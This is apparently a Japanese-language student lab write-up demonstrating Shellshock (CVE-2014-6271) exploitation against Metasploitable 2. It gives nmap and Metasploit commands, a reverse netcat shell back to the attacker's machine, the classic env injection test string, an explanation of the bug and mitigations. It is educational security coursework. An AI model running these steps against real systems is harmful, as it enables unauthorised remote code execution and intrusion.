
教育用ラボで、Metasploitable 2 を対象に Metasploit を使用した Shellshock(CVE-2014-6271)の悪用を実演します。スキャン、悪用、リバースシェル、および緩和策を含みます。
これは、脆弱性評価とペネトレーションテスト II の実践課題であり、Shellshock脆弱性(CVE-2014-6271)の悪用と分析に焦点を当てています。
制御されたラボ環境で、Metasploitable 2(ターゲット)とKali Linux(攻撃者)を使用して実施しました。
nmap -sS -sV <target-ip>
2️⃣ Metasploitの起動
msfconsole
3️⃣ エクスプロイトモジュールのロード
use exploit/multi/http/apache_mod_cgi_bash_env_exec
4️⃣ エクスプロイトの設定
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat
5️⃣ エクスプロイトの実行
exploit
📸 デモ内容
📡 Nmapスキャン結果
⚙️ Metasploitの設定
🔄 リバースシェルセッションの出力
🛠 エクスプロイト後のコマンド:
whoami
uname -a
ifconfig
Shellshockは、GNU Bashシェルの脆弱性であり、攻撃者が環境変数にコマンドを注入することで任意のコマンドを実行できるようにするものです。 2014年9月に発見され、CVE-2014-6271が割り当てられました。Bash v1.14からv4.3に影響します。
Bashは環境変数内の関数定義を誤って処理し、関数本体の後に追加のコマンドを実行します。 CGIスクリプトを使用するWebサーバーでは、HTTPヘッダーが環境変数になるため、攻撃経路が容易になります。
例:
env x='() { :;}; echo vulnerable' bash -c "echo test"
脆弱な場合、vulnerableと表示されます。
認証なしの完全なリモートコード実行(RCE)
単純なHTTPリクエストで悪用可能
ボットネット、ワーム、標的型攻撃で使用される
数百万のサーバー、ルーター、IoTデバイスに影響
Yahooサーバー – CGIスクリプト経由のマルウェア
Wopbotボットネット – 自動化された悪用
QNAP NAS – リモートシェルアクセスとマルウェア
自己増殖ワーム – 新たな脆弱なホストへの拡散
🔄 Bashを直ちに更新する
🚫 未使用のCGIスクリプトを無効にする
🔥 ファイアウォールを使用して不要なトラフィックをブロックする
🛡 Webアプリケーションファイアウォール(WAF)を導入する
📜 HTTPリクエストログを監視する
👤 最小権限の原則を適用する
このプロジェクトは教育目的のみです。 すべてのテストは制御されたラボ環境で行われました。 ❌ 許可なくシステムでこれらの技術を使用しないでください。
👨💻 作者: Janith Madhusankha 🎓 コース: BICT(優等)ネットワーク&セキュリティ 🏫 所属機関: スリランカ南東大学